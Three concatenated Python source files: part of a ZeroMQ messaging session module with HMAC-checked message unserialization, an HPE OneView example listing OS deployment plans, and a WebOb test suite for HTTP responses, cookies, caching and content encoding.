# split multipart message into identity list and message dict
# invalid large messages can cause very expensive string comparisons
idents, msg_list = self.feed_identities(msg_list, copy)
try:
return idents, self.unserialize(msg_list, content=content, copy=copy)
except Exception as e:
# TODO: handle it
raise e
def feed_identities(self, msg_list, copy=True):
"""Split the identities from the rest of the message.
Feed until DELIM is reached, then return the prefix as idents and
remainder as msg_list. This is easily broken by setting an IDENT to DELIM,
but that would be silly.
Parameters
----------
msg_list : a list of Message or bytes objects
The message to be split.
copy : bool
flag determining whether the arguments are bytes or Messages
Returns
-------
(idents, msg_list) : two lists
idents will always be a list of bytes, each of which is a ZMQ
identity. msg_list will be a list of bytes or zmq.Messages of the
form [HMAC,p_header,p_parent,p_content,buffer1,buffer2,...] and
should be unpackable/unserializable via self.unserialize at this
point.
"""
if copy:
idx = msg_list.index(DELIM)
return msg_list[:idx], msg_list[idx+1:]
else:
failed = True
for idx,m in enumerate(msg_list):
if m.bytes == DELIM:
failed = False
break
if failed:
raise ValueError("DELIM not in msg_list")
idents, msg_list = msg_list[:idx], msg_list[idx+1:]
return [m.bytes for m in idents], msg_list
def unserialize(self, msg_list, content=True, copy=True):
"""Unserialize a msg_list to a nested message dict.
This is roughly the inverse of serialize. The serialize/unserialize
methods work with full message lists, whereas pack/unpack work with
the individual message parts in the message list.
Parameters
----------
msg_list : list of bytes or Message objects
The list of message parts of the form [HMAC,p_header,p_parent,
p_content,buffer1,buffer2,...].
content : bool (True)
Whether to unpack the content dict (True), or leave it packed
(False).
copy : bool (True)
Whether to return the bytes (True), or the non-copying Message
object in each place (False).
Returns
-------
msg : dict
The nested message dict with top-level keys [header, parent_header,
content, buffers].
"""
minlen = 4
message = {}
if not copy:
for i in range(minlen):
msg_list[i] = msg_list[i].bytes
if self.auth is not None:
signature = msg_list[0]
if not signature:
raise ValueError("Unsigned Message")
if signature in self.digest_history:
raise ValueError("Duplicate Signature: %r"%signature)
self.digest_history.add(signature)
check = self.sign(msg_list[1:4])
if not signature == check:
raise ValueError("Invalid Signature: %r"%signature)
if not len(msg_list) >= minlen:
raise TypeError("malformed message, must have at least %i elements"%minlen)
header = self.unpack(msg_list[1])
message['header'] = header
message['msg_id'] = header['msg_id']
message['msg_type'] = header['msg_type']
message['parent_header'] = self.unpack(msg_list[2])
if content:
message['content'] = self.unpack(msg_list[3])
else:
message['content'] = msg_list[3]
message['buffers'] = msg_list[4:]
return message
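def _example_session_roundtrip():
    """Hedged sketch (added, not part of the original module): build a signed
    message with the default JSON packer, serialize it to the wire format
    described in `serialize`, and read it back. The key and message type are
    made up for illustration."""
    session = Session(key=b'example-key')
    msg = session.msg('ping', content={'payload': 1})
    wire = session.serialize(msg)            # [DELIM, HMAC, header, parent, content]
    idents, msg_list = session.feed_identities(wire)
    return session.unserialize(msg_list)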
def test_msg2obj():
am = dict(x=1)
ao = Message(am)
assert ao.x == am['x']
am['y'] = dict(z=1)
ao = Message(am)
assert ao.y.z == am['y']['z']
k1, k2 = 'y', 'z'
assert ao[k1][k2] == am[k1][k2]
am2 = dict(ao)
assert am['x'] == am2['x']
assert am['y']['z'] == am2['y']['z']
|
the-stack_106_23355 | # -*- coding: utf-8 -*-
###
# (C) Copyright (2012-2019) Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
###
from pprint import pprint
from config_loader import try_load_from_file
from hpOneView.oneview_client import OneViewClient
config = {
"ip": "<oneview_ip>",
"credentials": {
"userName": "<user>",
"password": "<password>"
}
}
# Try load config from a file (if there is a config file)
config = try_load_from_file(config)
oneview_client = OneViewClient(config)
os_deployment_plans = oneview_client.os_deployment_plans
print("\nGet OS Deployment Plans by Filter:")
plans = os_deployment_plans.get_by('deploymentType', 'I3S')
pprint(plans)
print("\nGet the OS Deployment Plan by Name:")
os_deployment_plan = os_deployment_plans.get_by('name', 'Deployment Plan')
pprint(os_deployment_plan)
print("\nGet all OS Deployment Plans:")
os_deployment_plans_all = os_deployment_plans.get_all()
pprint(os_deployment_plans_all)
|
the-stack_106_23356 | import sys
import zlib
if sys.version >= '2.7':
from io import BytesIO as StringIO
else:
from cStringIO import StringIO
try:
from hashlib import md5
except ImportError:
from md5 import md5
from nose.tools import eq_, ok_, assert_raises
from webob import BaseRequest, Request, Response
def simple_app(environ, start_response):
start_response('200 OK', [
('Content-Type', 'text/html; charset=utf8'),
])
return ['OK']
def test_response():
req = BaseRequest.blank('/')
res = req.get_response(simple_app)
assert res.status == '200 OK'
assert res.status_int == 200
assert res.body == "OK"
assert res.charset == 'utf8'
assert res.content_type == 'text/html'
res.status = 404
assert res.status == '404 Not Found'
assert res.status_int == 404
res.body = 'Not OK'
assert ''.join(res.app_iter) == 'Not OK'
res.charset = 'iso8859-1'
assert res.headers['content-type'] == 'text/html; charset=iso8859-1'
res.content_type = 'text/xml'
assert res.headers['content-type'] == 'text/xml; charset=iso8859-1'
res.headers = {'content-type': 'text/html'}
assert res.headers['content-type'] == 'text/html'
assert res.headerlist == [('content-type', 'text/html')]
res.set_cookie('x', 'y')
assert res.headers['set-cookie'].strip(';') == 'x=y; Path=/'
res = Response('a body', '200 OK', content_type='text/html')
res.encode_content()
assert res.content_encoding == 'gzip'
eq_(res.body, '\x1f\x8b\x08\x00\x00\x00\x00\x00\x02\xffKTH\xcaO\xa9\x04\x00\xf6\x86GI\x06\x00\x00\x00')
res.decode_content()
assert res.content_encoding is None
assert res.body == 'a body'
res.set_cookie('x', u'foo') # test unicode value
assert_raises(TypeError, Response, app_iter=iter(['a']),
body="somebody")
del req.environ
eq_(Response(request=req)._environ, req)
eq_(Response(request=req)._request, None)
assert_raises(TypeError, Response, charset=None,
body=u"unicode body")
assert_raises(TypeError, Response, wrong_key='dummy')
def test_content_type():
r = Response()
# default ctype and charset
eq_(r.content_type, 'text/html')
eq_(r.charset, 'UTF-8')
# setting to none, removes the header
r.content_type = None
eq_(r.content_type, None)
eq_(r.charset, None)
# can set missing ctype
r.content_type = None
eq_(r.content_type, None)
def test_cookies():
res = Response()
res.set_cookie('x', u'\N{BLACK SQUARE}') # test unicode value
eq_(res.headers.getall('set-cookie'), ['x="\\342\\226\\240"; Path=/']) # utf8 encoded
r2 = res.merge_cookies(simple_app)
r2 = BaseRequest.blank('/').get_response(r2)
eq_(r2.headerlist,
[('Content-Type', 'text/html; charset=utf8'),
('Set-Cookie', 'x="\\342\\226\\240"; Path=/'),
]
)
def test_http_only_cookie():
req = Request.blank('/')
res = req.get_response(Response('blah'))
res.set_cookie("foo", "foo", httponly=True)
eq_(res.headers['set-cookie'], 'foo=foo; Path=/; HttpOnly')
def test_headers():
r = Response()
tval = 'application/x-test'
r.headers.update({'content-type': tval})
eq_(r.headers.getall('content-type'), [tval])
def test_response_copy():
r = Response(app_iter=iter(['a']))
r2 = r.copy()
eq_(r.body, 'a')
eq_(r2.body, 'a')
def test_response_copy_content_md5():
res = Response()
res.md5_etag(set_content_md5=True)
assert res.content_md5
res2 = res.copy()
assert res.content_md5
assert res2.content_md5
eq_(res.content_md5, res2.content_md5)
def test_HEAD_closes():
req = Request.blank('/')
req.method = 'HEAD'
app_iter = StringIO('foo')
res = req.get_response(Response(app_iter=app_iter))
eq_(res.status_int, 200)
eq_(res.body, '')
ok_(app_iter.closed)
def test_HEAD_conditional_response_returns_empty_response():
from webob.response import EmptyResponse
req = Request.blank('/')
req.method = 'HEAD'
res = Response(request=req, conditional_response=True)
class FakeRequest:
method = 'HEAD'
if_none_match = 'none'
if_modified_since = False
range = False
def __init__(self, env):
self.env = env
def start_response(status, headerlist):
pass
res.RequestClass = FakeRequest
result = res({}, start_response)
ok_(isinstance(result, EmptyResponse))
def test_HEAD_conditional_response_range_empty_response():
from webob.response import EmptyResponse
req = Request.blank('/')
req.method = 'HEAD'
res = Response(request=req, conditional_response=True)
res.status_int = 200
res.body = 'Are we not men?'
res.content_length = len(res.body)
class FakeRequest:
method = 'HEAD'
if_none_match = 'none'
if_modified_since = False
def __init__(self, env):
self.env = env
self.range = self # simulate inner api
self.if_range = self
def content_range(self, length):
"""range attr"""
class Range:
start = 4
stop = 5
return Range
def match_response(self, res):
"""if_range_match attr"""
return True
def start_response(status, headerlist):
pass
res.RequestClass = FakeRequest
result = res({}, start_response)
ok_(isinstance(result, EmptyResponse), result)
def test_conditional_response_if_none_match_false():
req = Request.blank('/', if_none_match='foo')
resp = Response(app_iter=['foo\n'],
conditional_response=True, etag='foo')
resp = req.get_response(resp)
eq_(resp.status_int, 304)
def test_conditional_response_if_none_match_true():
req = Request.blank('/', if_none_match='foo')
resp = Response(app_iter=['foo\n'],
conditional_response=True, etag='bar')
resp = req.get_response(resp)
eq_(resp.status_int, 200)
def test_conditional_response_if_modified_since_false():
from datetime import datetime, timedelta
req = Request.blank('/', if_modified_since=datetime(2011, 3, 17, 13, 0, 0))
resp = Response(app_iter=['foo\n'], conditional_response=True,
last_modified=req.if_modified_since-timedelta(seconds=1))
resp = req.get_response(resp)
eq_(resp.status_int, 304)
def test_conditional_response_if_modified_since_true():
from datetime import datetime, timedelta
req = Request.blank('/', if_modified_since=datetime(2011, 3, 17, 13, 0, 0))
resp = Response(app_iter=['foo\n'], conditional_response=True,
last_modified=req.if_modified_since+timedelta(seconds=1))
resp = req.get_response(resp)
eq_(resp.status_int, 200)
def test_conditional_response_range_not_satisfiable_response():
req = Request.blank('/', range='bytes=100-200')
resp = Response(app_iter=['foo\n'], content_length=4,
conditional_response=True)
resp = req.get_response(resp)
eq_(resp.status_int, 416)
eq_(resp.content_range.start, None)
eq_(resp.content_range.stop, None)
eq_(resp.content_range.length, 4)
eq_(resp.body, 'Requested range not satisfiable: bytes=100-200')
def test_HEAD_conditional_response_range_not_satisfiable_response():
req = Request.blank('/', method='HEAD', range='bytes=100-200')
resp = Response(app_iter=['foo\n'], content_length=4,
conditional_response=True)
resp = req.get_response(resp)
eq_(resp.status_int, 416)
eq_(resp.content_range.start, None)
eq_(resp.content_range.stop, None)
eq_(resp.content_range.length, 4)
eq_(resp.body, '')
def test_del_environ():
res = Response()
res.environ = {'yo': 'mama'}
eq_(res.environ, {'yo': 'mama'})
del res.environ
eq_(res.environ, None)
eq_(res.request, None)
def test_set_request_environ():
res = Response()
class FakeRequest:
environ = {'jo': 'mama'}
res.request = FakeRequest
eq_(res.environ, {'jo': 'mama'})
eq_(res.request, FakeRequest)
res.environ = None
eq_(res.environ, None)
eq_(res.request, None)
def test_del_request():
res = Response()
class FakeRequest:
environ = {}
res.request = FakeRequest
del res.request
eq_(res.environ, None)
eq_(res.request, None)
def test_set_environ_via_request_subterfuge():
class FakeRequest:
def __init__(self, env):
self.environ = env
res = Response()
res.RequestClass = FakeRequest
res.request = {'action': 'dwim'}
eq_(res.environ, {'action': 'dwim'})
ok_(isinstance(res.request, FakeRequest))
eq_(res.request.environ, res.environ)
def test_set_request():
res = Response()
class FakeRequest:
environ = {'foo': 'bar'}
res.request = FakeRequest
eq_(res.request, FakeRequest)
eq_(res.environ, FakeRequest.environ)
res.request = None
eq_(res.environ, None)
eq_(res.request, None)
def test_md5_etag():
res = Response()
res.body = """\
In A.D. 2101
War was beginning.
Captain: What happen ?
Mechanic: Somebody set up us the bomb.
Operator: We get signal.
Captain: What !
Operator: Main screen turn on.
Captain: It's You !!
Cats: How are you gentlemen !!
Cats: All your base are belong to us.
Cats: You are on the way to destruction.
Captain: What you say !!
Cats: You have no chance to survive make your time.
Cats: HA HA HA HA ....
Captain: Take off every 'zig' !!
Captain: You know what you doing.
Captain: Move 'zig'.
Captain: For great justice."""
res.md5_etag()
ok_(res.etag)
ok_('\n' not in res.etag)
eq_(res.etag,
md5(res.body).digest().encode('base64').replace('\n', '').strip('='))
eq_(res.content_md5, None)
def test_md5_etag_set_content_md5():
res = Response()
b = 'The quick brown fox jumps over the lazy dog'
res.md5_etag(b, set_content_md5=True)
ok_(res.content_md5,
md5(b).digest().encode('base64').replace('\n', '').strip('='))
def test_decode_content_defaults_to_identity():
res = Response()
res.body = 'There be dragons'
res.decode_content()
eq_(res.body, 'There be dragons')
def test_decode_content_with_deflate():
res = Response()
b = 'Hey Hey Hey'
# Simulate inflate by chopping the headers off
# the gzip encoded data
res.body = zlib.compress(b)[2:-4]
res.content_encoding = 'deflate'
res.decode_content()
eq_(res.body, b)
eq_(res.content_encoding, None)
def test_content_length():
r0 = Response('x'*10, content_length=10)
req_head = Request.blank('/', method='HEAD')
r1 = req_head.get_response(r0)
eq_(r1.status_int, 200)
eq_(r1.body, '')
eq_(r1.content_length, 10)
req_get = Request.blank('/')
r2 = req_get.get_response(r0)
eq_(r2.status_int, 200)
eq_(r2.body, 'x'*10)
eq_(r2.content_length, 10)
r3 = Response(app_iter=['x']*10)
eq_(r3.content_length, None)
eq_(r3.body, 'x'*10)
eq_(r3.content_length, 10)
r4 = Response(app_iter=['x']*10, content_length=20) # wrong content_length
eq_(r4.content_length, 20)
assert_raises(AssertionError, lambda: r4.body)
req_range = Request.blank('/', range=(0,5))
r0.conditional_response = True
r5 = req_range.get_response(r0)
eq_(r5.status_int, 206)
eq_(r5.body, 'xxxxx')
eq_(r5.content_length, 5)
def test_app_iter_range():
req = Request.blank('/', range=(2,5))
for app_iter in [
['012345'],
['0', '12345'],
['0', '1234', '5'],
['01', '2345'],
['01', '234', '5'],
['012', '34', '5'],
['012', '3', '4', '5'],
['012', '3', '45'],
['0', '12', '34', '5'],
['0', '12', '345'],
]:
r = Response(
app_iter=app_iter,
content_length=6,
conditional_response=True,
)
res = req.get_response(r)
eq_(list(res.content_range), [2,5,6])
eq_(res.body, '234', 'body=%r; app_iter=%r' % (res.body, app_iter))
def test_app_iter_range_inner_method():
class FakeAppIter:
def app_iter_range(self, start, stop):
return 'you win', start, stop
res = Response(app_iter=FakeAppIter())
eq_(res.app_iter_range(30, 40), ('you win', 30, 40))
def test_content_type_in_headerlist():
# Couldn't manage to clone Response in order to modify class
# attributes safely. Shouldn't classes be fresh imported for every
# test?
default_content_type = Response.default_content_type
Response.default_content_type = None
try:
res = Response(headerlist=[('Content-Type', 'text/html')],
charset='utf8')
ok_(res._headerlist)
eq_(res.charset, 'utf8')
finally:
Response.default_content_type = default_content_type
def test_from_file():
res = Response('test')
equal_resp(res)
res = Response(app_iter=iter(['test ', 'body']),
content_type='text/plain')
equal_resp(res)
def equal_resp(res):
input_ = StringIO(str(res))
res2 = Response.from_file(input_)
eq_(res.body, res2.body)
eq_(res.headers, res2.headers)
def test_from_file_w_leading_space_in_header():
# Make sure the removal of code dealing with leading spaces is safe
res1 = Response()
file_w_space = StringIO('200 OK\n\tContent-Type: text/html; charset=UTF-8')
res2 = Response.from_file(file_w_space)
eq_(res1.headers, res2.headers)
def test_file_bad_header():
file_w_bh = StringIO('200 OK\nBad Header')
assert_raises(ValueError, Response.from_file, file_w_bh)
def test_set_status():
res = Response()
res.status = u"OK 200"
eq_(res.status, "OK 200")
assert_raises(TypeError, setattr, res, 'status', float(200))
def test_set_headerlist():
res = Response()
# looks like a list
res.headerlist = (('Content-Type', 'text/html; charset=UTF-8'),)
eq_(res.headerlist, [('Content-Type', 'text/html; charset=UTF-8')])
# has items
res.headerlist = {'Content-Type': 'text/html; charset=UTF-8'}
eq_(res.headerlist, [('Content-Type', 'text/html; charset=UTF-8')])
del res.headerlist
eq_(res.headerlist, [])
def test_request_uri_no_script_name():
from webob.response import _request_uri
environ = {
'wsgi.url_scheme': 'http',
'HTTP_HOST': 'test.com',
'SCRIPT_NAME': '/foobar',
}
eq_(_request_uri(environ), 'http://test.com/foobar')
def test_request_uri_https():
from webob.response import _request_uri
environ = {
'wsgi.url_scheme': 'https',
'SERVER_NAME': 'test.com',
'SERVER_PORT': '443',
'SCRIPT_NAME': '/foobar',
}
eq_(_request_uri(environ), 'https://test.com/foobar')
def test_app_iter_range_starts_after_iter_end():
from webob.response import AppIterRange
range = AppIterRange(iter([]), start=1, stop=1)
eq_(list(range), [])
def test_resp_write_app_iter_non_list():
res = Response(app_iter=('a','b'))
eq_(res.content_length, None)
res.write('c')
eq_(res.body, 'abc')
eq_(res.content_length, 3)
def test_response_file_body_writelines():
from webob.response import ResponseBodyFile
res = Response(app_iter=['foo'])
rbo = ResponseBodyFile(res)
rbo.writelines(['bar', 'baz'])
eq_(res.app_iter, ['foo', 'bar', 'baz'])
rbo.flush() # noop
eq_(res.app_iter, ['foo', 'bar', 'baz'])
def test_response_write_non_str():
res = Response()
assert_raises(TypeError, res.write, object())
def test_response_file_body_write_empty_app_iter():
from webob.response import ResponseBodyFile
res = Response('foo')
res.write('baz')
eq_(res.app_iter, ['foo', 'baz'])
def test_response_file_body_write_empty_body():
res = Response('')
res.write('baz')
eq_(res.app_iter, ['', 'baz'])
def test_response_file_body_close_not_implemented():
rbo = Response().body_file
assert_raises(NotImplementedError, rbo.close)
def test_response_file_body_repr():
rbo = Response().body_file
rbo.response = 'yo'
eq_(repr(rbo), "<body_file for 'yo'>")
def test_body_get_is_none():
res = Response()
res._app_iter = None
assert_raises(TypeError, Response, app_iter=iter(['a']),
body="somebody")
assert_raises(AttributeError, res.__getattribute__, 'body')
def test_body_get_is_unicode_notverylong():
res = Response(app_iter=(u'foo',))
assert_raises(TypeError, res.__getattribute__, 'body')
def test_body_get_is_unicode():
res = Response(app_iter=(['x'] * 51 + [u'x']))
assert_raises(TypeError, res.__getattribute__, 'body')
def test_body_set_not_unicode_or_str():
res = Response()
assert_raises(TypeError, res.__setattr__, 'body', object())
def test_body_set_unicode():
res = Response()
assert_raises(TypeError, res.__setattr__, 'body', u'abc')
def test_body_set_under_body_doesnt_exist():
res = Response('abc')
eq_(res.body, 'abc')
eq_(res.content_length, 3)
def test_body_del():
res = Response('123')
del res.body
eq_(res.body, '')
eq_(res.content_length, 0)
def test_text_get_no_charset():
res = Response(charset=None)
assert_raises(AttributeError, res.__getattribute__, 'text')
def test_unicode_body():
res = Response()
res.charset = 'utf-8'
bbody = 'La Pe\xc3\xb1a' # binary string
ubody = unicode(bbody, 'utf-8') # unicode string
res.body = bbody
eq_(res.unicode_body, ubody)
res.ubody = ubody
eq_(res.body, bbody)
del res.ubody
eq_(res.body, '')
def test_text_get_decode():
res = Response()
res.charset = 'utf-8'
res.body = 'La Pe\xc3\xb1a'
eq_(res.text, unicode('La Pe\xc3\xb1a', 'utf-8'))
def test_text_set_no_charset():
res = Response()
res.charset = None
assert_raises(AttributeError, res.__setattr__, 'text', 'abc')
def test_text_set_not_unicode():
res = Response()
res.charset = 'utf-8'
assert_raises(TypeError, res.__setattr__, 'text',
'La Pe\xc3\xb1a')
def test_text_del():
res = Response('123')
del res.text
eq_(res.body, '')
eq_(res.content_length, 0)
def test_body_file_del():
res = Response()
res.body = '123'
eq_(res.content_length, 3)
eq_(res.app_iter, ['123'])
del res.body_file
eq_(res.body, '')
eq_(res.content_length, 0)
def test_write_unicode():
res = Response()
res.text = unicode('La Pe\xc3\xb1a', 'utf-8')
res.write(u'a')
eq_(res.text, unicode('La Pe\xc3\xb1aa', 'utf-8'))
def test_write_unicode_no_charset():
res = Response(charset=None)
assert_raises(TypeError, res.write, u'a')
def test_write_text():
res = Response()
res.body = 'abc'
res.write(u'a')
eq_(res.text, 'abca')
def test_app_iter_del():
res = Response(
content_length=3,
app_iter=['123'],
)
del res.app_iter
eq_(res.body, '')
eq_(res.content_length, None)
def test_charset_set_no_content_type_header():
res = Response()
res.headers.pop('Content-Type', None)
assert_raises(AttributeError, res.__setattr__, 'charset', 'utf-8')
def test_charset_del_no_content_type_header():
res = Response()
res.headers.pop('Content-Type', None)
eq_(res._charset__del(), None)
def test_content_type_params_get_no_semicolon_in_content_type_header():
res = Response()
res.headers['Content-Type'] = 'foo'
eq_(res.content_type_params, {})
def test_content_type_params_get_semicolon_in_content_type_header():
res = Response()
res.headers['Content-Type'] = 'foo;encoding=utf-8'
eq_(res.content_type_params, {'encoding':'utf-8'})
def test_content_type_params_set_value_dict_empty():
res = Response()
res.headers['Content-Type'] = 'foo;bar'
res.content_type_params = None
eq_(res.headers['Content-Type'], 'foo')
def test_content_type_params_set_ok_param_quoting():
res = Response()
res.content_type_params = {'a':''}
eq_(res.headers['Content-Type'], 'text/html; a=""')
def test_set_cookie_overwrite():
res = Response()
res.set_cookie('a', '1')
res.set_cookie('a', '2', overwrite=True)
eq_(res.headerlist[-1], ('Set-Cookie', 'a=2; Path=/'))
def test_set_cookie_value_is_None():
res = Response()
res.set_cookie('a', None)
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 4
val.sort()
eq_(val[0], 'Max-Age=0')
eq_(val[1], 'Path=/')
eq_(val[2], 'a=')
assert val[3].startswith('expires')
def test_set_cookie_expires_is_None_and_max_age_is_int():
res = Response()
res.set_cookie('a', '1', max_age=100)
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 4
val.sort()
eq_(val[0], 'Max-Age=100')
eq_(val[1], 'Path=/')
eq_(val[2], 'a=1')
assert val[3].startswith('expires')
def test_set_cookie_expires_is_None_and_max_age_is_timedelta():
from datetime import timedelta
res = Response()
res.set_cookie('a', '1', max_age=timedelta(seconds=100))
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 4
val.sort()
eq_(val[0], 'Max-Age=100')
eq_(val[1], 'Path=/')
eq_(val[2], 'a=1')
assert val[3].startswith('expires')
def test_set_cookie_expires_is_not_None_and_max_age_is_None():
import datetime
res = Response()
then = datetime.datetime.utcnow() + datetime.timedelta(days=1)
res.set_cookie('a', '1', expires=then)
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 4
val.sort()
ok_(val[0] in ('Max-Age=86399', 'Max-Age=86400'))
eq_(val[1], 'Path=/')
eq_(val[2], 'a=1')
assert val[3].startswith('expires')
def test_set_cookie_value_is_unicode():
res = Response()
val = unicode('La Pe\xc3\xb1a', 'utf-8')
res.set_cookie('a', val)
eq_(res.headerlist[-1], (r'Set-Cookie', 'a="La Pe\\303\\261a"; Path=/'))
def test_delete_cookie():
res = Response()
res.headers['Set-Cookie'] = 'a=2; Path=/'
res.delete_cookie('a')
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 4
val.sort()
eq_(val[0], 'Max-Age=0')
eq_(val[1], 'Path=/')
eq_(val[2], 'a=')
assert val[3].startswith('expires')
def test_delete_cookie_with_path():
res = Response()
res.headers['Set-Cookie'] = 'a=2; Path=/'
res.delete_cookie('a', path='/abc')
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 4
val.sort()
eq_(val[0], 'Max-Age=0')
eq_(val[1], 'Path=/abc')
eq_(val[2], 'a=')
assert val[3].startswith('expires')
def test_delete_cookie_with_domain():
res = Response()
res.headers['Set-Cookie'] = 'a=2; Path=/'
res.delete_cookie('a', path='/abc', domain='example.com')
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 5
val.sort()
eq_(val[0], 'Domain=example.com')
eq_(val[1], 'Max-Age=0')
eq_(val[2], 'Path=/abc')
eq_(val[3], 'a=')
assert val[4].startswith('expires')
def test_unset_cookie_not_existing_and_not_strict():
res = Response()
result = res.unset_cookie('a', strict=False)
assert result is None
def test_unset_cookie_not_existing_and_strict():
res = Response()
assert_raises(KeyError, res.unset_cookie, 'a')
def test_unset_cookie_key_in_cookies():
res = Response()
res.headers.add('Set-Cookie', 'a=2; Path=/')
res.headers.add('Set-Cookie', 'b=3; Path=/')
res.unset_cookie('a')
eq_(res.headers.getall('Set-Cookie'), ['b=3; Path=/'])
def test_merge_cookies_no_set_cookie():
res = Response()
result = res.merge_cookies('abc')
eq_(result, 'abc')
def test_merge_cookies_resp_is_Response():
inner_res = Response()
res = Response()
res.set_cookie('a', '1')
result = res.merge_cookies(inner_res)
eq_(result.headers.getall('Set-Cookie'), ['a=1; Path=/'])
def test_merge_cookies_resp_is_wsgi_callable():
L = []
def dummy_wsgi_callable(environ, start_response):
L.append((environ, start_response))
return 'abc'
res = Response()
res.set_cookie('a', '1')
wsgiapp = res.merge_cookies(dummy_wsgi_callable)
environ = {}
def dummy_start_response(status, headers, exc_info=None):
eq_(headers, [('Set-Cookie', 'a=1; Path=/')])
result = wsgiapp(environ, dummy_start_response)
assert result == 'abc'
assert len(L) == 1
L[0][1]('200 OK', []) # invoke dummy_start_response assertion
def test_body_get_body_is_None_len_app_iter_is_zero():
res = Response()
res._app_iter = StringIO()
res._body = None
result = res.body
eq_(result, '')
def test_cache_control_get():
res = Response()
eq_(repr(res.cache_control), "<CacheControl ''>")
eq_(res.cache_control.max_age, None)
def test_location():
# covers webob/response.py:934-938
res = Response()
res.location = '/test.html'
eq_(res.location, '/test.html')
req = Request.blank('/')
eq_(req.get_response(res).location, 'http://localhost/test.html')
res.location = '/test2.html'
eq_(req.get_response(res).location, 'http://localhost/test2.html')
def test_request_uri_http():
# covers webob/response.py:1152
from webob.response import _request_uri
environ = {
'wsgi.url_scheme': 'http',
'SERVER_NAME': 'test.com',
'SERVER_PORT': '80',
'SCRIPT_NAME': '/foobar',
}
eq_(_request_uri(environ), 'http://test.com/foobar')
def test_request_uri_no_script_name2():
# covers webob/response.py:1160
# There is a test_request_uri_no_script_name in test_response.py, but it
# sets SCRIPT_NAME.
from webob.response import _request_uri
environ = {
'wsgi.url_scheme': 'http',
'HTTP_HOST': 'test.com',
'PATH_INFO': '/foobar',
}
eq_(_request_uri(environ), 'http://test.com/foobar')
def test_cache_control_object_max_age_ten():
res = Response()
res.cache_control.max_age = 10
eq_(repr(res.cache_control), "<CacheControl 'max-age=10'>")
eq_(res.headers['cache-control'], 'max-age=10')
def test_cache_control_set_object_error():
res = Response()
assert_raises(AttributeError, setattr, res.cache_control, 'max_stale', 10)
def test_cache_expires_set():
res = Response()
res.cache_expires = True
eq_(repr(res.cache_control),
"<CacheControl 'max-age=0, must-revalidate, no-cache, no-store'>")
def test_status_int_set():
res = Response()
res.status_int = 400
eq_(res._status, '400 Bad Request')
def test_cache_control_set_dict():
res = Response()
res.cache_control = {'a':'b'}
eq_(repr(res.cache_control), "<CacheControl 'a=b'>")
def test_cache_control_set_None():
res = Response()
res.cache_control = None
eq_(repr(res.cache_control), "<CacheControl ''>")
def test_cache_control_set_unicode():
res = Response()
res.cache_control = u'abc'
eq_(repr(res.cache_control), "<CacheControl 'abc'>")
def test_cache_control_set_control_obj_is_not_None():
class DummyCacheControl(object):
def __init__(self):
self.header_value = 1
self.properties = {'bleh':1}
res = Response()
res._cache_control_obj = DummyCacheControl()
res.cache_control = {}
eq_(res.cache_control.properties, {})
def test_cache_control_del():
res = Response()
del res.cache_control
eq_(repr(res.cache_control), "<CacheControl ''>")
def test_body_file_get():
res = Response()
result = res.body_file
from webob.response import ResponseBodyFile
eq_(result.__class__, ResponseBodyFile)
def test_body_file_write_no_charset():
res = Response(charset=None)
assert_raises(TypeError, res.write, u'foo')
def test_body_file_write_unicode_encodes():
from webob.response import ResponseBodyFile
s = unicode('La Pe\xc3\xb1a', 'utf-8')
res = Response()
res.write(s)
eq_(res.app_iter, ['', 'La Pe\xc3\xb1a'])
def test_repr():
res = Response()
ok_(repr(res).endswith('200 OK>'))
def test_cache_expires_set_timedelta():
res = Response()
from datetime import timedelta
delta = timedelta(seconds=60)
res.cache_expires(seconds=delta)
eq_(res.cache_control.max_age, 60)
def test_cache_expires_set_int():
res = Response()
res.cache_expires(seconds=60)
eq_(res.cache_control.max_age, 60)
def test_cache_expires_set_None():
res = Response()
res.cache_expires(seconds=None, a=1)
eq_(res.cache_control.a, 1)
def test_cache_expires_set_zero():
res = Response()
res.cache_expires(seconds=0)
eq_(res.cache_control.no_store, True)
eq_(res.cache_control.no_cache, '*')
eq_(res.cache_control.must_revalidate, True)
eq_(res.cache_control.max_age, 0)
eq_(res.cache_control.post_check, 0)
def test_encode_content_unknown():
res = Response()
assert_raises(AssertionError, res.encode_content, 'badencoding')
def test_encode_content_identity():
res = Response()
result = res.encode_content('identity')
eq_(result, None)
def test_encode_content_gzip_already_gzipped():
res = Response()
res.content_encoding = 'gzip'
result = res.encode_content('gzip')
eq_(result, None)
def test_encode_content_gzip_notyet_gzipped():
res = Response()
res.app_iter = StringIO('foo')
result = res.encode_content('gzip')
eq_(result, None)
eq_(res.content_length, 23)
eq_(res.app_iter, ['\x1f\x8b\x08\x00\x00\x00\x00\x00\x02\xff', '',
'K\xcb\xcf\x07\x00', '!es\x8c\x03\x00\x00\x00'])
